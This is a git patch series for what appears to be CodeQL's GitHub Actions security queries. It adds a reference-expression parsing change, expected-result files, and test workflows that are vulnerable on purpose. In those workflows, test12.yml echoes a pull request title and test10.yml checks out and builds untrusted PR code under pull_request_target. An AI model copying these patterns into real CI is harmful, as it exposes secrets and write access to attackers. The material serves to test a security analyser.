secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-polkadot-picasso-kusama + artifact: hyperspace-composable-polkadot-picasso-kusama:latest + + mantis-e2e: + name: mantis-e2e + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - build-all-checks-packages + runs-on: + - ubuntu-latest-m + concurrency: + group: ${{ inputs.github_workflow }}-mantis-e2e-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - name: Devnet integration tests + run: | + nix run .#mantis-e2e --accept-flake-config --impure + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 665e9626b24..c91470d5cc8 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -16,5 +16,15 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8707849328b..711a529b179 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -109,6 +109,42 @@ edges | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/pr-workflow.yml:57:9:60:6 | Uses Step | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | +| .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | .github/workflows/pr-workflow.yml:78:9:81:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | .github/workflows/pr-workflow.yml:124:9:126:2 | Run Step | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | +| .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | .github/workflows/pr-workflow.yml:158:9:196:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:209:9:216:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:227:9:230:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:243:9:250:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:261:9:265:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:277:9:284:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:295:9:298:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:309:9:314:6 | Run Step | .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | +| .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | .github/workflows/pr-workflow.yml:318:9:323:2 | Run Step | +| .github/workflows/pr-workflow.yml:337:9:343:6 | Uses Step | .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | +| .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | +| .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | +| .github/workflows/pr-workflow.yml:380:9:386:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | +| .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -170,6 +206,7 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From ef41db3ce51e254d6adc8c2ea58f8313965433a6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:24 +0200 Subject: [PATCH 0500/1267] Extract simple reference expression from ORed disjuncts --- ql/lib/codeql/actions/ast/internal/Ast.qll | 38 +++++++++++++++------- 1 file changed, 27 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d9738cb74ad..23b5ead7f0e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -153,17 +153,18 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { YamlNode key; YamlString value; string rawExpression; - string expression; + string fullExpression; int exprOffset; ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") - then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() - else expression = rawExpression.trim() + then + fullExpression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else fullExpression = rawExpression.trim() } - override string toString() { result = expression } + override string toString() { result = fullExpression } override AstNodeImpl getAChildNode() { none() } @@ -173,7 +174,9 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { override YamlNode getNode() { none() } - string getExpression() { result = expression } + string getExpression() { result = fullExpression } + + string getFullExpression() { result = fullExpression } string getRawExpression() { result = rawExpression } @@ -1262,12 +1265,15 @@ class RunImpl extends StepImpl { */ bindingset[s] string getASimpleReferenceExpression(string s, int offset) { + // If the expression is ${{ inputs.foo == "foo" }} we should not consider it as a simple reference + // check that expression matches a simple reference or several simple references ORed with || + s.regexpMatch("([A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)(\\s*\\|\\|\\s*[A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)*") and // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) - .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", _) } bindingset[s] @@ -1319,18 +1325,28 @@ string getAJsonReferenceAccessPath(string s, int offset) { } /** - * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + string expression; + SimpleReferenceExpressionImpl() { - exists(getASimpleReferenceExpression(expression, _)) or - exists(getAJsonReferenceExpression(expression, _)) + ( + expression = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + expression = this.getFullExpression() + ) } + override string getExpression() { result = expression } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); + + override string toString() { result = expression } } class JsonReferenceExpressionImpl extends ExpressionImpl { @@ -1338,8 +1354,8 @@ class JsonReferenceExpressionImpl extends ExpressionImpl { string accessPath; JsonReferenceExpressionImpl() { - innerExpression = getAJsonReferenceExpression(expression, _) and - accessPath = getAJsonReferenceAccessPath(expression, _) + innerExpression = getAJsonReferenceExpression(this.getExpression(), _) and + accessPath = getAJsonReferenceAccessPath(this.getExpression(), _) } string getInnerExpression() { result = innerExpression } From 25a210734b223d1284b06cd2da2a45701cc6a1e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:36 +0200 Subject: [PATCH 0501/1267] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 ------- .../CWE-094/.github/workflows/test12.yml | 13 +++++++ .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + .../CWE-829/.github/workflows/test10.yml | 37 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 9 +++++ .../CWE-829/UntrustedCheckoutHigh.expected | 3 ++ 7 files changed, 65 insertions(+), 14 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml deleted file mode 100644 index bb873ca4eac..00000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: CI - -on: - pull_request_target: - -jobs: - test: - runs-on: ubuntu-latest - steps: - - run: | - echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} - - - diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml new file mode 100644 index 00000000000..f81bef89568 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -0,0 +1,13 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.title || "foo" }}" + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 2097a589b5a..4123359b551 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -475,6 +476,7 @@ subpaths | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ce4d74467f9..fa665b85388 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml new file mode 100644 index 00000000000..e8b5466f751 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -0,0 +1,37 @@ +name: Build Android app (stripe) +on: + push: + branches: + - main + - fix-ci + workflow_dispatch: + pull_request_target: + branches: + - main + paths: + - 'custom-payment-flow/client/android-kotlin/**' + - '!**.css' + - '!**.md' + +jobs: + android_build: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.after || github.event.pull_request.head.sha }} + + - name: Build + working-directory: custom-payment-flow/client/android-kotlin + run: | + ./gradlew build + + dependabot-auto-merge: + if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} + needs: android_build + permissions: + contents: write + pull-requests: write + uses: ./.github/workflows/wf_dependabot.yaml + secrets: inherit diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 711a529b179..7313ffd9ae3 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -174,6 +174,7 @@ edges | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -207,6 +208,13 @@ edges | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | 